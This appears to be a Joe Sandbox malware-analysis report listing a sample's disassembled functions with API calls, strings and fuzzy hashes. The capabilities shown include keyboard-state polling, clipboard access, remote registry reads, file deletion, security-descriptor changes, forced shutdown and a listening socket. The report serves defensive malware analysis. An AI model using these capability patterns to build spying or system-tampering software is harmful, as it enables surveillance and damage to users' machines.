Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
Instruction ID: bcbdda5832d4e993654042a17c7bce0f89348b476afe5dbd102a77e36721b7ed
Opcode Fuzzy Hash: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
Instruction Fuzzy Hash: B631E5715012196FDF10DBB4EC89AEF77ACDF49324F141276E811B32A0EB30DA4ACA64

Function 00EC81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D

Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC825B
_memset.LIBCMT ref: 00EC8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC828F
GetLengthSid.ADVAPI32(?), ref: 00EC82A0
GetAce.ADVAPI32(?,00000000,?), ref: 00EC82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC82F9
GetLengthSid.ADVAPI32(?), ref: 00EC8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8325
HeapAlloc.KERNEL32(00000000), ref: 00EC832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC834D
CopySid.ADVAPI32(00000000), ref: 00EC8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC83BF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
Instruction ID: c6d0c82632b49a761d0c5bc4cc1f4900ff84b5f9acc9003bc188734a07de8eb7
Opcode Fuzzy Hash: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
Instruction Fuzzy Hash: E5612D71A00109BFDF109F95DF44EAEBBB9FF44704F149269E815B7251DB319A06CB60

Function 00E86843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

BSR_UNICODE), xrefs: 00EC1771
ANY), xrefs: 00EC1717
UTF16), xrefs: 00EC1508
LF), xrefs: 00EC16DD
NO_START_OPT), xrefs: 00EC1588
UTF), xrefs: 00EC1533
UCP), xrefs: 00EC1546
NO_AUTO_POSSESS), xrefs: 00EC1567
CR), xrefs: 00EC16C0
LIMIT_MATCH=, xrefs: 00EC15A9
ANYCRLF), xrefs: 00EC1734
BSR_ANYCRLF), xrefs: 00EC1757
CRLF), xrefs: 00EC16FA
Oa, xrefs: 00EC1888, 00EC192F, 00EC19DD
85ecfcffff506804010000ff9514ffffff8d4db8518d95ecfcffff528d85ecfcffff50ff9510ffffff6a0068800000006a036a006a0768000000808d8decfcffff, xrefs: 00E8690D
LIMIT_RECURSION=, xrefs: 00EC1635

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID: 85ecfcffff506804010000ff9514ffffff8d4db8518d95ecfcffff528d85ecfcffff50ff9510ffffff6a0068800000006a036a006a0768000000808d8decfcffff$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
API String ID: 0-2337862333
Opcode ID: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
Instruction ID: 799443bc8b2524544373ce199cd31c3b02ac9a0fc50c53f92ce960fad40d1abd
Opcode Fuzzy Hash: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
Instruction Fuzzy Hash: 25727F71E002199BDB14DF58C980BEEB7B5FF49314F1491AAE849FB281DB319D82CB90

Function 00EF0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0737

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EF07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EF086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EF0AAD
RegCloseKey.ADVAPI32(00000000), ref: 00EF0ABA

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: a6582245b49e878bc11241b414c55214b7d7fd18e7a16a67fdaa1ab057f578f8
Instruction ID: 72036277a0ef8db48c753dcf125a947a4f76e98566606c929300ae0f809133b6
Opcode Fuzzy Hash: a6582245b49e878bc11241b414c55214b7d7fd18e7a16a67fdaa1ab057f578f8
Instruction Fuzzy Hash: 1DE15D31204714AFCB14DF25C881E6ABBE9EF89714F04956DF54AEB2A2DB30ED05CB51

Function 00ED0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00ED0241
GetAsyncKeyState.USER32(000000A0), ref: 00ED02C2
GetKeyState.USER32(000000A0), ref: 00ED02DD
GetAsyncKeyState.USER32(000000A1), ref: 00ED02F7
GetKeyState.USER32(000000A1), ref: 00ED030C
GetAsyncKeyState.USER32(00000011), ref: 00ED0324
GetKeyState.USER32(00000011), ref: 00ED0336
GetAsyncKeyState.USER32(00000012), ref: 00ED034E
GetKeyState.USER32(00000012), ref: 00ED0360
GetAsyncKeyState.USER32(0000005B), ref: 00ED0378
GetKeyState.USER32(0000005B), ref: 00ED038A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
Instruction ID: 34ce7999c3facdd0407f252a71eb4ad840ff75369b5c063970db5c94e1a3c8ef
Opcode Fuzzy Hash: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
Instruction Fuzzy Hash: 9341A4245047C96EFF319AA488083B5BFA0EF52348F4C509FD5C6663C2EB949DC9C7A2

Function 00EE86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

CoInitialize.OLE32 ref: 00EE8718
CoUninitialize.OLE32 ref: 00EE8723
CoCreateInstance.OLE32(?,00000000,00000017,00F02BEC,?), ref: 00EE8783
IIDFromString.OLE32(?,?), ref: 00EE87F6
VariantInit.OLEAUT32(?), ref: 00EE8890
VariantClear.OLEAUT32(?), ref: 00EE88F1

Strings

Invalid parameter, xrefs: 00EE880F
NULL Pointer assignment, xrefs: 00EE87C8
Failed to create object, xrefs: 00EE878E, 00EE8844

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 6b954ff0e8eb8c91d847508e88dd138d98e484c6ff332ba95e1cac4f84d4c147
Instruction ID: 37aea6c2cbeca1a6ab41428e84657c5fefcf3be3a28f117d13160df98efd312a
Opcode Fuzzy Hash: 6b954ff0e8eb8c91d847508e88dd138d98e484c6ff332ba95e1cac4f84d4c147
Instruction Fuzzy Hash: F661E0706083459FD714DF26CA44B6ABBE4AF88714F50581EF989AB291CB30ED48CB92

Function 00E84140 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00E844DB
ERCP, xrefs: 00E8421F
VUUU, xrefs: 00EB7B0C
Oa, xrefs: 00E84984, 00EB8173
VUUU, xrefs: 00E844ED
85ecfcffff506804010000ff9514ffffff8d4db8518d95ecfcffff528d85ecfcffff50ff9510ffffff6a0068800000006a036a006a0768000000808d8decfcffff, xrefs: 00E8448E, 00E84499
VUUU, xrefs: 00E84520

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID: 85ecfcffff506804010000ff9514ffffff8d4db8518d95ecfcffff528d85ecfcffff50ff9510ffffff6a0068800000006a036a006a0768000000808d8decfcffff$ERCP$Oa$VUUU$VUUU$VUUU$VUUU
API String ID: 0-876385396
Opcode ID: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
Instruction ID: 0569c3eaff9e0f531cba4e475aab4dec1a1e360505db21564b90e14ce8e9f1d0
Opcode Fuzzy Hash: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
Instruction Fuzzy Hash: 8CA25EB0A0421ACBDF24DF58C9507EEB7B1FB54318F14A1AAD85EB7680E7709E81DB50

Function 00EE4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00EE447F
EmptyClipboard.USER32 ref: 00EE4485
GlobalAlloc.KERNEL32(00000002,?), ref: 00EE449A
CloseClipboard.USER32 ref: 00EE4539

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
Instruction ID: 94112844c24cec14433f19918ef5ea3c4cd3c26ada0aa15d26928ee7e39eb65f
Opcode Fuzzy Hash: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
Instruction Fuzzy Hash: 9A2182753012149FDB109F56EC49B7A77A8EF84715F11806AF906FB2B1CB30AD05CB94

Function 00ED3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE

Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4

FindFirstFileW.KERNEL32(?,?), ref: 00ED3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00ED3B87
MoveFileW.KERNEL32(?,?), ref: 00ED3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00ED3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00ED3BF5

Strings

\*.*, xrefs: 00ED3A8A, 00ED3A93, 00ED3AA8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
Instruction ID: d528b76324c7088d95f082649503897dee4286b6834b9b2ea1d679c92f6427e2
Opcode Fuzzy Hash: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
Instruction Fuzzy Hash: 16517F318011489ADF15EBA0DD929EDB7B8EF14304F64A1ABE44A77191DF316F0ECBA1

Function 00EDF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EDF6AB
Sleep.KERNEL32(0000000A), ref: 00EDF6DB
_wcscmp.LIBCMT ref: 00EDF6EF
_wcscmp.LIBCMT ref: 00EDF70A
FindNextFileW.KERNEL32(?,?), ref: 00EDF7A8
FindClose.KERNEL32(00000000), ref: 00EDF7BE

Strings

*.*, xrefs: 00EDF690

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
Instruction ID: 5e6c6a46ba45d5c0428f3573f4543b758a090daac99113fd0e7f6149fe10827d
Opcode Fuzzy Hash: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
Instruction Fuzzy Hash: 3D419D7190020A9FCF10DF64CC85AEEBBB4FF05314F14556BE81AB62A0EB309E85CB90

Function 00E858C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E85A05
_memmove.LIBCMT ref: 00E85A55
_memmove.LIBCMT ref: 00E85ABB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: bc115955d85169a360b30c70d4094e065ff0ac788f01dc1497d7a5ff05659841
Instruction ID: 9e046514814ff454571267e6caaada4bac734d8660462e484e38e1af990d5a7e
Opcode Fuzzy Hash: bc115955d85169a360b30c70d4094e065ff0ac788f01dc1497d7a5ff05659841
Instruction Fuzzy Hash: FF127971A00609DBDF14DFA4DA81AEEB7F5FF48300F109569E84AB7251EB36AA11CB50

Function 00E85680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041

_memmove.LIBCMT ref: 00EC062F
_memmove.LIBCMT ref: 00EC0744
_memmove.LIBCMT ref: 00EC07EB

Strings

yZ, xrefs: 00EC0881, 00EC07FF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZ
API String ID: 1300846289-3798167742
Opcode ID: 3c1ce72c23ff1768220656c2422f88b85dd60d653db1ac00d7197e7bb8b0473e
Instruction ID: d0f277c09646b9d93efd873380a87c6360ff857a36b686b350d922f61dd97a94
Opcode Fuzzy Hash: 3c1ce72c23ff1768220656c2422f88b85dd60d653db1ac00d7197e7bb8b0473e
Instruction Fuzzy Hash: 93028471A00205DFDF18DF64DA81AAE7BF5FF44300F5490A9E80AEB255EB32DA51CB91

Function 00ED545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47

ExitWindowsEx.USER32(?,00000000), ref: 00ED549B

Strings

SeShutdownPrivilege, xrefs: 00ED546B
@, xrefs: 00ED548E
, xrefs: 00ED5489

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
Instruction ID: 3b47332119272f1f43b3bebea50c3e684f708597acd0cd3140f6d98a36eb8229
Opcode Fuzzy Hash: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
Instruction Fuzzy Hash: 9B014733654A112EF7285678EC4AFBA7258EB01356F242027FC27F22D2DA910C828192

Function 00E83190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oa, xrefs: 00E83482

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oa
API String ID: 674341424-3945284152
Opcode ID: 1fc0f365b5dbad80bb192f10abbcb93e70e42071e77c8e09a9602dacfbd607e3
Instruction ID: 9f64e8c7f2f2d6433cbf2ee6dafd5c82d943ed0071aed796d90101df441f13d5
Opcode Fuzzy Hash: 1fc0f365b5dbad80bb192f10abbcb93e70e42071e77c8e09a9602dacfbd607e3
Instruction Fuzzy Hash: 93228D715083019FC724EF24C891BAFB7E5AF84714F10A91DF99EA7291DB71EA04CB92

Function 00EE6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00EE65EF
WSAGetLastError.WSOCK32(00000000), ref: 00EE65FE
bind.WSOCK32(00000000,?,00000010), ref: 00EE661A
listen.WSOCK32(00000000,00000005), ref: 00EE6629
WSAGetLastError.WSOCK32(00000000), ref: 00EE6643
closesocket.WSOCK32(00000000), ref: 00EE6657

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
Instruction ID: 8330296ce7effc8085e406e371230b33112d0fda3a7cedfba9309f7c16d171b8
Opcode Fuzzy Hash: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
Instruction Fuzzy Hash: B221CC312002049FCB00AF25C889B7EB7F9EF88364F109169E91AB73D2CB30AD05CB50

Function 00E71287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00E719FA
GetSysColor.USER32(0000000F), ref: 00E71A4E
SetBkColor.GDI32(?,00000000), ref: 00E71A61

